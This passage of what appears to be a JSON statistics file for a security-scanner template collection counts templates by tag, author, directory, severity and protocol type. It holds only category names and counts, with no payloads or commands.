"dokuwiki","count":1},{"name":"sassy","count":1},{"name":"sitefinity","count":1},{"name":"minimouse","count":1},{"name":"wildfly","count":1},{"name":"daybyday","count":1},{"name":"clink-office","count":1},{"name":"saltapi","count":1},{"name":"owa","count":1},{"name":"lumis","count":1},{"name":"wifisky","count":1},{"name":"hue","count":1},{"name":"ddownload","count":1},{"name":"scs","count":1},{"name":"dotnet","count":1},{"name":"alertmanager","count":1},{"name":"avada","count":1},{"name":"gilacms","count":1},{"name":"karel","count":1},{"name":"comfortel","count":1},{"name":"ebird","count":1},{"name":"thedogapi","count":1},{"name":"raspap","count":1},{"name":"tpshop","count":1},{"name":"mx","count":1},{"name":"stytch","count":1},{"name":"dropbox","count":1},{"name":"adiscon","count":1},{"name":"geoserver","count":1},{"name":"fortilogger","count":1},{"name":"sso","count":1},{"name":"zentral","count":1},{"name":"strider","count":1},{"name":"bravenewcoin","count":1},{"name":"honeypot","count":1},{"name":"shoppable","count":1},{"name":"coinapi","count":1},{"name":"sls","count":1},{"name":"netweaver","count":1},{"name":"openresty","count":1},{"name":"iterable","count":1},{"name":"babel","count":1},{"name":"maccmsv10","count":1},{"name":"php-fusion","count":1},{"name":"teradici","count":1},{"name":"playable","count":1},{"name":"h2","count":1},{"name":"phpfastcache","count":1},{"name":"phpfusion","count":1},{"name":"xml","count":1},{"name":"pendo","count":1},{"name":"learnpress","count":1},{"name":"objectinjection","count":1},{"name":"synapse","count":1},{"name":"emessage","count":1},{"name":"xamr","count":1},{"name":"camunda","count":1},{"name":"meraki","count":1},{"name":"cobub","count":1},{"name":"myvuehelp","count":1},{"name":"qvisdvr","count":1},{"name":"short.io","count":1},{"name":"AlphaWeb","count":1},{"name":"api-manager","count":1},{"name":"barracuda","count":1},{"name":"unisharp","count":1},{"name":"caseaware","count":1},{"name":"mkdocs","count":1},{"name":"ecom"
,"count":1},{"name":"webftp","count":1},{"name":"wix","count":1},{"name":"logontracer","count":1},{"name":"emerson","count":1},{"name":"coinmarketcap","count":1},{"name":"fcm","count":1},{"name":"raspberrymatic","count":1},{"name":"ns","count":1},{"name":"jnoj","count":1},{"name":"xampp","count":1},{"name":"blackboard","count":1},{"name":"fanwei","count":1},{"name":"shopxo","count":1},{"name":"visualstudio","count":1},{"name":"hivemanager","count":1},{"name":"aerohive","count":1},{"name":"turbocrm","count":1},{"name":"hanwang","count":1},{"name":"acontent","count":1},{"name":"petfinder","count":1},{"name":"eg","count":1},{"name":"gofile","count":1},{"name":"apple","count":1},{"name":"submitty","count":1},{"name":"tika","count":1},{"name":"find","count":1},{"name":"appweb","count":1},{"name":"mantis","count":1},{"name":"clearbit","count":1},{"name":"projector","count":1},{"name":"wowza","count":1},{"name":"lacie","count":1},{"name":"stridercd","count":1},{"name":"ocs-inventory","count":1},{"name":"episerver","count":1},{"name":"cve2021wordpress","count":1},{"name":"strava","count":1},{"name":"gerapy","count":1},{"name":"cgit","count":1},{"name":"crm","count":1},{"name":"redcap","count":1},{"name":"jinfornet","count":1},{"name":"nownodes","count":1},{"name":"acme","count":1},{"name":"shopizer","count":1},{"name":"activecollab","count":1},{"name":"planon","count":1},{"name":"zenphoto","count":1},{"name":"box","count":1},{"name":"intelliflash","count":1},{"name":"rmc","count":1},{"name":"nutanix","count":1},{"name":"jwt","count":1},{"name":"cse","count":1},{"name":"myucms","count":1},{"name":"kingdee","count":1},{"name":"flexbe","count":1},{"name":"secmail","count":1},{"name":"sauter","count":1},{"name":"tor","count":1},{"name":"formcraft3","count":1},{"name":"oliver","count":1},{"name":"viewlinc","count":1},{"name":"sceditor","count":1},{"name":"oauth2","count":1},{"name":"workresources","count":1},{"name":"tieline","count":1},{"name":"xdcms","count":1},{"name":"covale
nt","count":1},{"name":"microcomputers","count":1},{"name":"activeadmin","count":1},{"name":"kvm","count":1},{"name":"simplecrm","count":1},{"name":"noptin","count":1},{"name":"jabber","count":1},{"name":"expn","count":1},{"name":"checkmarx","count":1},{"name":"vision","count":1},{"name":"plc","count":1},{"name":"huemagic","count":1},{"name":"olivetti","count":1},{"name":"instagram","count":1},{"name":"icinga","count":1},{"name":"taiga","count":1},{"name":"mozilla","count":1},{"name":"graylog","count":1},{"name":"clave","count":1},{"name":"perl","count":1},{"name":"rmi","count":1},{"name":"yopass","count":1},{"name":"sage","count":1},{"name":"spip","count":1},{"name":"triconsole","count":1},{"name":"nifi","count":1},{"name":"txt","count":1},{"name":"starttls","count":1},{"name":"cname","count":1},{"name":"directadmin","count":1},{"name":"extractor","count":1},{"name":"varnish","count":1},{"name":"biqsdrive","count":1},{"name":"casemanager","count":1},{"name":"pastebin","count":1},{"name":"iconfinder","count":1},{"name":"paneil","count":1},{"name":"haproxy","count":1},{"name":"cve2002","count":1},{"name":"improvmx","count":1},{"name":"realteo","count":1},{"name":"octobercms","count":1},{"name":"bitquery","count":1},{"name":"adafruit","count":1},{"name":"prototype","count":1},{"name":"pollbot","count":1},{"name":"accent","count":1},{"name":"mariadb","count":1},{"name":"bhagavadgita","count":1},{"name":"knowage","count":1},{"name":"kyocera","count":1},{"name":"mongo-express","count":1},{"name":"plone","count":1},{"name":"socomec","count":1},{"name":"wmt","count":1},{"name":"dvdFab","count":1},{"name":"acemanager","count":1},{"name":"ruoyi","count":1},{"name":"ninjaform","count":1},{"name":"restler","count":1},{"name":"markdown","count":1},{"name":"timeclock","count":1},{"name":"zmanda","count":1},{"name":"hiawatha","count":1},{"name":"holidayapi","count":1},{"name":"aniapi","count":1},{"name":"appveyor","count":1},{"name":"place","count":1},{"name":"snipeit","count":1}
,{"name":"sast","count":1},{"name":"semaphore","count":1},{"name":"mediumish","count":1},{"name":"caa","count":1},{"name":"rainloop","count":1},{"name":"elevation","count":1},{"name":"totaljs","count":1},{"name":"tarantella","count":1},{"name":"shiro","count":1},{"name":"spiderfoot","count":1},{"name":"gstorage","count":1},{"name":"kramer","count":1},{"name":"oam","count":1},{"name":"etouch","count":1},{"name":"hrsale","count":1},{"name":"finereport","count":1},{"name":"st","count":1},{"name":"struts2","count":1},{"name":"spidercontrol","count":1},{"name":"xds","count":1},{"name":"tjws","count":1},{"name":"directum","count":1},{"name":"portal","count":1},{"name":"shopware","count":1},{"name":"zend","count":1},{"name":"telecom","count":1},{"name":"aura","count":1},{"name":"h5s","count":1},{"name":"cron","count":1},{"name":"pan","count":1},{"name":"scimono","count":1},{"name":"optimizely","count":1},{"name":"opengear","count":1},{"name":"ncomputing","count":1},{"name":"apcu","count":1},{"name":"delta","count":1},{"name":"slocum","count":1},{"name":"zuul","count":1},{"name":"securityspy","count":1},{"name":"sunflower","count":1},{"name":"pyramid","count":1},{"name":"admin","count":1},{"name":"open-redirect","count":1},{"name":"fontawesome","count":1},{"name":"smartsheet","count":1},{"name":"server","count":1},{"name":"avatier","count":1},{"name":"cofax","count":1},{"name":"newsletter","count":1},{"name":"threatq","count":1},{"name":"geolocation","count":1},{"name":"landray","count":1},{"name":"buttercms","count":1},{"name":"nps","count":1},{"name":"eyoumail","count":1},{"name":"fastapi","count":1},{"name":"commvault","count":1},{"name":"bazarr","count":1},{"name":"xmlchart","count":1},{"name":"comodo","count":1},{"name":"esxi","count":1},{"name":"moinmoin","count":1},{"name":"jeecg-boot","count":1},{"name":"bitrise","count":1},{"name":"bedita","count":1},{"name":"books","count":1},{"name":"jaspersoft","count":1},{"name":"prestahome","count":1},{"name":"workspace","coun
t":1},{"name":"opentsdb","count":1},{"name":"eyesofnetwork","count":1},{"name":"kodexplorer","count":1},{"name":"centreon","count":1},{"name":"ewebs","count":1},{"name":"iserver","count":1},{"name":"iframe","count":1},{"name":"pyspider","count":1},{"name":"doh","count":1},{"name":"goanywhere","count":1},{"name":"calendly","count":1},{"name":"openerp","count":1},{"name":"web-dispatcher","count":1},{"name":"nimble","count":1},{"name":"fortigates","count":1},{"name":"h5sconsole","count":1},{"name":"postgres","count":1},{"name":"opensmtpd","count":1},{"name":"mailboxvalidator","count":1},{"name":"flowci","count":1},{"name":"commscope","count":1},{"name":"zeppelin","count":1},{"name":"billquick","count":1},{"name":"cerebro","count":1},{"name":"clockwatch","count":1},{"name":"yongyou","count":1},{"name":"b2bbuilder","count":1},{"name":"iucn","count":1},{"name":"vscode","count":1},{"name":"wiki","count":1},{"name":"musicstore","count":1},{"name":"opensearch","count":1},{"name":"ecshop","count":1},{"name":"coinranking","count":1},{"name":"adb","count":1},{"name":"vms","count":1},{"name":"cscart","count":1},{"name":"servicedesk","count":1},{"name":"travis","count":1},{"name":"ymhome","count":1},{"name":"feedwordpress","count":1},{"name":"abuseipdb","count":1},{"name":"springframework","count":1},{"name":"blueiris","count":1},{"name":"erp-nc","count":1},{"name":"labtech","count":1},{"name":"franklinfueling","count":1},{"name":"geutebruck","count":1},{"name":"huijietong","count":1},{"name":"idera","count":1},{"name":"spotify","count":1},{"name":"epm","count":1},{"name":"coinlayer","count":1},{"name":"supervisor","count":1},{"name":"dicoogle","count":1},{"name":"vanguard","count":1},{"name":"speed","count":1},{"name":"vsftpd","count":1},{"name":"darkstat","count":1},{"name":"oki","count":1},{"name":"nomad","count":1},{"name":"fastcgi","count":1},{"name":"tamronos","count":1},{"name":"phpunit","count":1},{"name":"limit","count":1},{"name":"default","count":1},{"name":"rdp","coun
t":1},{"name":"wakatime","count":1},{"name":"mara","count":1},{"name":"mod-proxy","count":1},{"name":"interlib","count":1},{"name":"cve2001","count":1},{"name":"instatus","count":1},{"name":"portainer","count":1},{"name":"seopanel","count":1},{"name":"lionwiki","count":1},{"name":"whmcs","count":1},{"name":"xunchi","count":1},{"name":"sprintful","count":1},{"name":"bingmaps","count":1},{"name":"expressjs","count":1},{"name":"processmaker","count":1},{"name":"sponip","count":1},{"name":"phalcon","count":1},{"name":"kodi","count":1},{"name":"viaware","count":1},{"name":"kerbynet","count":1},{"name":"tinymce","count":1},{"name":"xproxy","count":1},{"name":"console","count":1},{"name":"kronos","count":1},{"name":"ilo4","count":1},{"name":"hiboss","count":1},{"name":"biostar2","count":1},{"name":"dnssec","count":1},{"name":"dasan","count":1},{"name":"osquery","count":1},{"name":"prismaweb","count":1},{"name":"sterling","count":1},{"name":"phpwiki","count":1},{"name":"xiuno","count":1},{"name":"issabel","count":1},{"name":"quantum","count":1},{"name":"salesforce","count":1},{"name":"eibiz","count":1},{"name":"shortcode","count":1},{"name":"mrtg","count":1},{"name":"mapbox","count":1},{"name":"memory-pipes","count":1},{"name":"websvn","count":1},{"name":"smuggling","count":1},{"name":"eyou","count":1},{"name":"zookeeper","count":1},{"name":"ganglia","count":1},{"name":"harvardart","count":1},{"name":"dahua","count":1},{"name":"opm","count":1},{"name":"luftguitar","count":1},{"name":"softaculous","count":1},{"name":"clustering","count":1},{"name":"crestron","count":1},{"name":"etherscan","count":1},{"name":"adoptapet","count":1},{"name":"okta","count":1},{"name":"idemia","count":1},{"name":"cors","count":1},{"name":"mappress","count":1},{"name":"onkyo","count":1},{"name":"k8","count":1},{"name":"csod","count":1},{"name":"charity","count":1},{"name":"weglot","count":1},{"name":"radius","count":1},{"name":"edgemax","count":1},{"name":"ueditor","count":1},{"name":"opencast","c
ount":1},{"name":"cve2004","count":1},{"name":"ssi","count":1},{"name":"suprema","count":1},{"name":"robomongo","count":1},{"name":"adfs","count":1},{"name":"yealink","count":1},{"name":"tekon","count":1},{"name":"joget","count":1},{"name":"alltube","count":1},{"name":"avalanche","count":1},{"name":"secret","count":1},{"name":"tracer","count":1},{"name":"neo4j","count":1},{"name":"javafaces","count":1},{"name":"solman","count":1},{"name":"particle","count":1},{"name":"mtheme","count":1},{"name":"gunicorn","count":1},{"name":"bullwark","count":1},{"name":"myanimelist","count":1},{"name":"zzzphp","count":1},{"name":"sco","count":1},{"name":"ncbi","count":1},{"name":"pagerduty","count":1},{"name":"wordcloud","count":1},{"name":"froxlor","count":1},{"name":"directions","count":1},{"name":"sourcebans","count":1},{"name":"scanii","count":1},{"name":"zenario","count":1},{"name":"urlscan","count":1},{"name":"wondercms","count":1},{"name":"expose","count":1},{"name":"calendarix","count":1},{"name":"axiom","count":1},{"name":"hortonworks","count":1},{"name":"abstractapi","count":1},{"name":"stem","count":1},{"name":"dericam","count":1},{"name":"werkzeug","count":1},{"name":"achecker","count":1},{"name":"containers","count":1},{"name":"webmodule-ee","count":1},{"name":"email","count":1},{"name":"emby","count":1},{"name":"oscommerce","count":1},{"name":"pihole","count":1},{"name":"kyan","count":1},{"name":"roundcube","count":1},{"name":"dixell","count":1},{"name":"rsa","count":1},{"name":"zoomsounds","count":1},{"name":"jenzabar","count":1},{"name":"h3c-imc","count":1},{"name":"webui","count":1},{"name":"ipstack","count":1},{"name":"fiori","count":1},{"name":"jreport","count":1},{"name":"nc2","count":1},{"name":"opnsense","count":1},{"name":"clockwork","count":1},{"name":"identityguard","count":1},{"name":"lenovo","count":1},{"name":"nearby","count":1},{"name":"wavlink","count":1},{"name":"nette","count":1},{"name":"rudloff","count":1},{"name":"apigee","count":1},{"name":"logan
alyzer","count":1},{"name":"blockfrost","count":1},{"name":"shoretel","count":1},{"name":"barco","count":1},{"name":"addpac","count":1},{"name":"mojoauth","count":1},{"name":"meshcentral","count":1},{"name":"pieregister","count":1},{"name":"secnet","count":1},{"name":"allied","count":1},{"name":"gemweb","count":1},{"name":"tuxedo","count":1},{"name":"openx","count":1},{"name":"mongoshake","count":1},{"name":"dom","count":1},{"name":"groupoffice","count":1},{"name":"monitorix","count":1},{"name":"buildkite","count":1},{"name":"scalar","count":1},{"name":"catfishcms","count":1},{"name":"accuweather","count":1},{"name":"wing-ftp","count":1},{"name":"parentlink","count":1},{"name":"tianqing","count":1}],"authors":[{"name":"daffainfo","count":560},{"name":"dhiyaneshdk","count":421},{"name":"pikpikcu","count":316},{"name":"pdteam","count":262},{"name":"geeknik","count":178},{"name":"dwisiswant0","count":168},{"name":"princechaddha","count":130},{"name":"0x_akoko","count":129},{"name":"gy741","count":117},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":46},{"name":"gaurang","count":42},{"name":"ritikchaddha","count":37},{"name":"philippedelteil","count":36},{"name":"adam 
crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":23},{"name":"ffffffff0x","count":22},{"name":"righettod","count":18},{"name":"cckuailong","count":17},{"name":"akincibor","count":16},{"name":"for3stco1d","count":15},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"r3dg33k","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":14},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"sullo","count":12},{"name":"wdahlenb","count":11},{"name":"melbadry9","count":11},{"name":"cyllective","count":11},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"meme-lord","count":10},{"name":"johnk3r","count":10},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"dogasantos","count":9},{"name":"emadshanab","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"edoardottt","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"logicalhunter","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"random-robbie","count":7},{"name":"randomstr1ng","count":7},{"name":"divya_mudgal","count":7},{"name":"rootxharsh","count":6},{"name":"puzzlepeaches","count":6},{"name":"leovalcante","count":6},{"name":"iamnoooob","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"pathtaga","count":6},{"name":"evan 
rubinstein","count":6},{"name":"pentest_swissky","count":6},{"name":"forgedhallpass","count":6},{"name":"panch0r3d","count":5},{"name":"podalirius","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"imnightmaree","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"_0xf4n9x_","count":5},{"name":"defr0ggy","count":4},{"name":"dadevel","count":4},{"name":"nodauf","count":4},{"name":"tanq16","count":4},{"name":"dolev farhi","count":4},{"name":"e_schultze_","count":4},{"name":"tess","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"supras","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"whoever","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"impramodsargar","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"andydoering","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"davidmckennirey","count":3},{"name":"f1tz","count":3},{"name":"h1ei1","count":3},{"name":"arcc","count":3},{"name":"z3bd","count":3},{"name":"skeltavik","count":3},{"name":"sushantkamble","count":3},{"name":"github.com/its0x08","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"johnjhacking","count":3},{"name":"alifathi-h1","count":3},{"name":"mr-xn","count":3},{"name":"gitlab red team","count":3},{"name":"emenalf","count":3},{"name":"shine","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"lark-lab","count":3},{"name":"r3naissance","count":3},{"name":"me9187","count":3},{"name":"g4l1t0","count":2},{"name":"kiblyn11","count":2},{"name":"k11h-de","count":2},{"name":"splint3r7","count":2},{"name":"nvn1729","count":2},{"name":"mahendra purbia 
(mah3sec_)","count":2},{"name":"r12w4n","count":2},{"name":"mohammedsaneem","count":2},{"name":"ehsahil","count":2},{"name":"kre80r","count":2},{"name":"bananabr","count":2},{"name":"dahse89","count":2},{"name":"manas_harsh","count":2},{"name":"bing0o","count":2},{"name":"koti2","count":2},{"name":"raesene","count":2},{"name":"its0x08","count":2},{"name":"luci","count":2},{"name":"hackerarpan","count":2},{"name":"hahwul","count":2},{"name":"vavkamil","count":2},{"name":"martincodes-de","count":2},{"name":"0xsmiley","count":2},{"name":"nuk3s3c","count":2},{"name":"foulenzer","count":2},{"name":"rafaelwdornelas","count":2},{"name":"0xcrypto","count":2},{"name":"bsysop","count":2},{"name":"parth","count":2},{"name":"socketz","count":2},{"name":"0xrudra","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"vsh00t","count":2},{"name":"y4er","count":2},{"name":"fabaff","count":2},{"name":"thardt-praetorian","count":2},{"name":"ajaysenr","count":2},{"name":"0xprial","count":2},{"name":"convisoappsec","count":2},{"name":"bp0lr","count":2},{"name":"geekby","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"cocxanh","count":2},{"name":"paradessia","count":2},{"name":"udit_thakkur","count":2},{"name":"cckuakilong","count":2},{"name":"bernardofsr","count":2},{"name":"hetroublemakr","count":2},{"name":"zomsop82","count":2},{"name":"amsda","count":2},{"name":"z0ne","count":2},{"name":"afaq","count":2},{"name":"ambassify","count":2},{"name":"x1m_martijn","count":2},{"name":"sbani","count":2},{"name":"hassan khan yusufzai - 
splint3r7","count":2},{"name":"0xelkomy","count":2},{"name":"paperpen","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"taielab","count":2},{"name":"joeldeleep","count":2},{"name":"danielmofer","count":2},{"name":"pxmme1337","count":2},{"name":"dheerajmadhukar","count":2},{"name":"lotusdll","count":2},{"name":"sy3omda","count":2},{"name":"w4cky_","count":2},{"name":"redteambrasil","count":2},{"name":"huowuzhao","count":2},{"name":"swissky","count":2},{"name":"nkxxkn","count":2},{"name":"moritz nentwig","count":2},{"name":"randomrobbie","count":2},{"name":"smaranchand","count":2},{"name":"aresx","count":1},{"name":"justmumu","count":1},{"name":"zandros0","count":1},{"name":"0xtavian","count":1},{"name":"ahmetpergamum","count":1},{"name":"hexcat","count":1},{"name":"berkdusunur","count":1},{"name":"jeya.seelan","count":1},{"name":"exceed","count":1},{"name":"amnotacat","count":1},{"name":"mhdsamx","count":1},{"name":"bughuntersurya","count":1},{"name":"yashgoti","count":1},{"name":"sherlocksecurity","count":1},{"name":"jas37","count":1},{"name":"absshax","count":1},{"name":"phyr3wall","count":1},{"name":"_harleo","count":1},{"name":"push4d","count":1},{"name":"brenocss","count":1},{"name":"thesubtlety","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"lethargynavigator","count":1},{"name":"hanlaomo","count":1},{"name":"ringo","count":1},{"name":"orpheus","count":1},{"name":"clarkvoss","count":1},{"name":"akshansh","count":1},{"name":"tim_koopmans","count":1},{"name":"charanrayudu","count":1},{"name":"regala_","count":1},{"name":"shifacyclewla","count":1},{"name":"ofjaaah","count":1},{"name":"s1r1u5_","count":1},{"name":"rschio","count":1},{"name":"husain","count":1},{"name":"3th1c_yuk1","count":1},{"name":"andirrahmani1","count":1},{"name":"thebinitghimire","count":1},{"name":"affix","count":1},{"name":"jrolf","count":1},{"name":"jeya 
seelan","count":1},{"name":"coldfish","count":1},{"name":"xstp","count":1},{"name":"0xteles","count":1},{"name":"v0idc0de","count":1},{"name":"intx0x80","count":1},{"name":"kabirsuda","count":1},{"name":"ahmed sherif","count":1},{"name":"0xceeb","count":1},{"name":"0xh7ml","count":1},{"name":"yuansec","count":1},{"name":"toufik-airane","count":1},{"name":"daffianfo","count":1},{"name":"yashanand155","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"prettyboyaaditya","count":1},{"name":"mubassirpatel","count":1},{"name":"wlayzz","count":1},{"name":"nerrorsec","count":1},{"name":"pudsec","count":1},{"name":"xshuden","count":1},{"name":"philippdelteil","count":1},{"name":"sshell","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"arr0way","count":1},{"name":"myztique","count":1},{"name":"knassar702","count":1},{"name":"willd96","count":1},{"name":"dawid-czarnecki","count":1},{"name":"tea","count":1},{"name":"evan rubinstien","count":1},{"name":"0ut0fb4nd","count":1},{"name":"rotemreiss","count":1},{"name":"compr00t","count":1},{"name":"wabafet","count":1},{"name":"co0nan","count":1},{"name":"revblock","count":1},{"name":"ggranjus","count":1},{"name":"akash.c","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"harshinsecurity","count":1},{"name":"official_blackhat13","count":1},{"name":"fmunozs","count":1},{"name":"luskabol","count":1},{"name":"evolutionsec","count":1},{"name":"juicypotato1","count":1},{"name":"xeldax","count":1},{"name":"kailashbohara","count":1},{"name":"mass0ma","count":1},{"name":"mah3sec_","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dievus","count":1},{"name":"duty_1g","count":1},{"name":"udyz","count":1},{"name":"alperenkesk","count":1},{"name":"ahmed 
abou-ela","count":1},{"name":"hakluke","count":1},{"name":"florianmaak","count":1},{"name":"b0yd","count":1},{"name":"sickwell","count":1},{"name":"patralos","count":1},{"name":"apt-mirror","count":1},{"name":"bartu utku sarp","count":1},{"name":"nytr0gen","count":1},{"name":"noamrathaus","count":1},{"name":"act1on3","count":1},{"name":"alex","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"makyotox","count":1},{"name":"elmahdi","count":1},{"name":"d4vy","count":1},{"name":"th3.d1p4k","count":1},{"name":"p-l-","count":1},{"name":"cookiehanhoan","count":1},{"name":"momen eldawakhly","count":1},{"name":"f1she3","count":1},{"name":"alevsk","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"andysvints","count":1},{"name":"droberson","count":1},{"name":"ldionmarcil","count":1},{"name":"micha3lb3n","count":1},{"name":"retr0","count":1},{"name":"x6263","count":1},{"name":"soyelmago","count":1},{"name":"jteles","count":1},{"name":"ok_bye_now","count":1},{"name":"qlkwej","count":1},{"name":"skylark-lab","count":1},{"name":"igibanez","count":1},{"name":"shreyapohekar","count":1},{"name":"streetofhackerr007","count":1},{"name":"thevillagehacker","count":1},{"name":"izn0u","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"nielsing","count":1},{"name":"breno_css","count":1},{"name":"chron0x","count":1},{"name":"notsoevilweasel","count":1},{"name":"zhenwarx","count":1},{"name":"blckraven","count":1},{"name":"anon-artist","count":1},{"name":"infosecsanyam","count":1},{"name":"0xrod","count":1},{"name":"retr02332","count":1},{"name":"kiks7","count":1},{"name":"osamahamad","count":1},{"name":"thezakman","count":1},{"name":"luqmaan 
hadia","count":1},{"name":"zinminphy0","count":1},{"name":"manuelbua","count":1},{"name":"majidmc2","count":1},{"name":"becivells","count":1},{"name":"furkansayim","count":1},{"name":"ipanda","count":1},{"name":"tirtha_mandal","count":1},{"name":"miroslavsotak","count":1},{"name":"clment cruchet","count":1},{"name":"exploitation","count":1},{"name":"lark lab","count":1},{"name":"mesaglio","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"iampritam","count":1},{"name":"exid","count":1},{"name":"petruknisme","count":1},{"name":"tirtha","count":1},{"name":"yavolo","count":1},{"name":"shelld3v","count":1},{"name":"b0rn2r00t","count":1},{"name":"j33n1k4","count":1},{"name":"sec_hawk","count":1},{"name":"0h1in9e","count":1},{"name":"0xd0ff9","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"geraldino2","count":1},{"name":"bad5ect0r","count":1},{"name":"deena","count":1},{"name":"rodnt","count":1},{"name":"manasmbellani","count":1},{"name":"zsusac","count":1},{"name":"aaronchen0","count":1},{"name":"fq_hsu","count":1},{"name":"remonsec","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"adrianmf","count":1},{"name":"un-fmunozs","count":1},{"name":"kareemse1im","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"furkansenan","count":1},{"name":"0xceba","count":1},{"name":"schniggie","count":1},{"name":"kurohost","count":1},{"name":"ilovebinbash","count":1},{"name":"borna nematzadeh","count":1},{"name":"elouhi","count":1},{"name":"ooooooo_q","count":1},{"name":"matthew nickerson (b0than) @ layer 8 
security","count":1},{"name":"omarkurt","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"arall","count":1},{"name":"gboddin","count":1},{"name":"kaizensecurity","count":1},{"name":"daviey","count":1},{"name":"mrcl0wnlab","count":1},{"name":"notnotnotveg","count":1},{"name":"flag007","count":1},{"name":"narluin","count":1},{"name":"b4uh0lz","count":1},{"name":"oscarintherocks","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"c3l3si4n","count":1},{"name":"noobexploiter","count":1},{"name":"francescocarlucci","count":1},{"name":"2rs3c","count":1},{"name":"_darrenmartyn","count":1},{"name":"luqman","count":1},{"name":"undefl0w","count":1},{"name":"veshraj","count":1},{"name":"brabbit10","count":1},{"name":"d0rkerdevil","count":1},{"name":"pratik khalane","count":1},{"name":"vzamanillo","count":1},{"name":"elder tao","count":1},{"name":"sicksec","count":1},{"name":"opencirt","count":1},{"name":"whynotke","count":1},{"name":"bjhulst","count":1},{"name":"_c0wb0y_","count":1},{"name":"jiheon-dev","count":1},{"name":"pdp","count":1},{"name":"dhiyaneshdki","count":1},{"name":"rubina119","count":1},{"name":"alexrydzak","count":1},{"name":"jbaines-r7","count":1}],"directory":[{"name":"cves","count":1154},{"name":"exposed-panels","count":519},{"name":"vulnerabilities","count":446},{"name":"technologies","count":251},{"name":"exposures","count":203},{"name":"misconfiguration","count":196},{"name":"workflows","count":186},{"name":"token-spray","count":153},{"name":"default-logins","count":95},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1183},{"name":"high","count":870},{"name":"medium","count":658},{"name":"critical","count":411},{"name":"low","count":180},{"name":"unknown","count":6}],"
types":[{"name":"http","count":3164},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1156},{"name":"panel","count":515},{"name":"lfi","count":461},{"name":"xss","count":367},{"name":"wordpress","count":364},{"name":"exposure","count":293},{"name":"rce","count":291},{"name":"cve2021","count":283},{"name":"tech","count":271},{"name":"wp-plugin","count":264},{"name":"cve2020","count":197},{"name":"","count":188},{"name":"token-spray","count":154},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":121},{"name":"apache","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"default-login","count":110},{"name":"unauth","count":108},{"name":"iot","count":102},{"name":"oast","count":97},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":71},{"name":"misconfig","count":65},{"name":"cve2017","count":64},{"name":"cve2022","count":63},{"name":"sqli","count":62},{"name":"ssrf","count":61},{"name":"file","count":60},{"name":"wp","count":55},{"name":"network","count":53},{"name":"router","count":52},{"name":"oracle","count":50},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"auth-bypass","count":39},{"name":"cve2014","count":37},{"name":"google","count":36},{"name":"cve2015","count":36},{"name":"cisco","count":35},{"name":"authenticated","count":35},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"listing","count":30},{"name":"jira","count":30},{"name":"injection","count":30},{"name":"traversal","count":29},{"name":"devops","count":28},{"name":"generic","count":26},{"name":"kubernetes","count":25},{"name":"adobe","count":24},{"name":"cms","count":24},{"name":"springboot","count":24},{"name":"oss","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"microsoft","count":21
